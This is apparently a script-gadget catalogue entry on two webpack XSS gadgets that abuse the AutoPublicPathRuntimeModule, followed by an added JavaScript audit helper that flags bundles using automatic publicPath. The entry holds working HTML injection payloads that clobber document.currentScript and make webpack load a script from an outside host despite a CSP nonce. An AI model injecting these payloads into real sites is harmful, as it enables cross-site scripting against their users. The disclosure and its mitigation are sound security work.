Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset.
It is possible to take advantage of part of the fix for CVE-2024-43788, which uses the src= of the last <script> tag on the page to load additional modules. As with the CVE, it is mandatory to have the AutoPublicPathRuntimeModule enabled.
For this to work, the user input must be placed above the bundle script tag. We then use a trick based on table HTML mutation to make it move down the DOM tree. This ensures that when Webpack loads, our script is already in the DOM and positioned below it, something that normally shouldn't be possible, since the page stops loading while a script is being executed.
<!-- user input -->
<img name="currentScript"><table>
<script src="https://gmsgadget.com/assets/xss/index.js"></script>
<div>
<script nonce="secret" src="/assets/libs/webpack/bundle.js"></script>
</div>
Found by @kevin_mizu.
It is mandatory to have the AutoPublicPathRuntimeModule enabled.
<!-- user input -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
<script nonce="secret" src="/assets/libs/webpack/5.92.1/bundle.js"></script>
Found by jackfromeast, ishmeals.
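Both gadgets above only apply when the bundle carries webpack's AutoPublicPathRuntimeModule, i.e. when output.publicPath is left at "auto" and the runtime derives the chunk base URL from document.currentScript or the last <script> src. The following audit helper is an added example, not code from this page or from webpack: it scans built bundles for the markers that runtime module leaves behind and reports which files still depend on automatic publicPath resolution. The marker strings are an assumption about the webpack runtime's wording and should be checked against the webpack version you actually ship; the sample bundle sources are constructed.

```javascript
// Added example (not from the gadget page or from webpack): flag bundles that
// rely on webpack's automatic publicPath, i.e. that embed the
// AutoPublicPathRuntimeModule and therefore compute __webpack_require__.p at
// runtime from document.currentScript or the last <script> element's src.
//
// Assumption (verify against your webpack version): the emitted runtime module
// references document.currentScript and contains the error string below, which
// survives minification because it is a string literal.
const AUTO_PUBLIC_PATH_MARKERS = [
  "Automatic publicPath is not supported in this browser",
  "document.currentScript",
];

// Returns true when every marker is present in the bundle source.
function usesAutoPublicPath(bundleSource) {
  return AUTO_PUBLIC_PATH_MARKERS.every((marker) => bundleSource.includes(marker));
}

// bundles: { [fileName]: sourceText }. Returns one finding per affected file.
function auditBundles(bundles) {
  const findings = [];
  for (const [file, source] of Object.entries(bundles)) {
    if (usesAutoPublicPath(source)) {
      findings.push({
        file,
        issue:
          "bundle resolves publicPath from the DOM at runtime (AutoPublicPathRuntimeModule); " +
          "set output.publicPath to a fixed value in webpack.config.js",
      });
    }
  }
  return findings;
}

// Constructed sample inputs (not real webpack output): one bundle that still
// uses automatic publicPath, one built with an explicit output.publicPath.
const SAMPLE_BUNDLES = {
  "bundle-auto.js":
    'var scriptUrl;if(document.currentScript)scriptUrl=document.currentScript.src;' +
    'if(!scriptUrl)throw new Error("Automatic publicPath is not supported in this browser");',
  "bundle-explicit.js":
    '__webpack_require__.p="/assets/libs/webpack/";',
};

// Stand-alone usage: print findings for the constructed samples.
for (const finding of auditBundles(SAMPLE_BUNDLES)) {
  console.log(`${finding.file}: ${finding.issue}`);
}
```

Run this over your built output directory (read each .js file into the bundles map). Any file it flags is one where an attacker-controlled element placed before or after the bundle <script> can influence where additional chunks are loaded from; the fix on the application side is to set a fixed output.publicPath in the webpack configuration, which causes webpack to emit a constant __webpack_require__.p instead of the automatic runtime module.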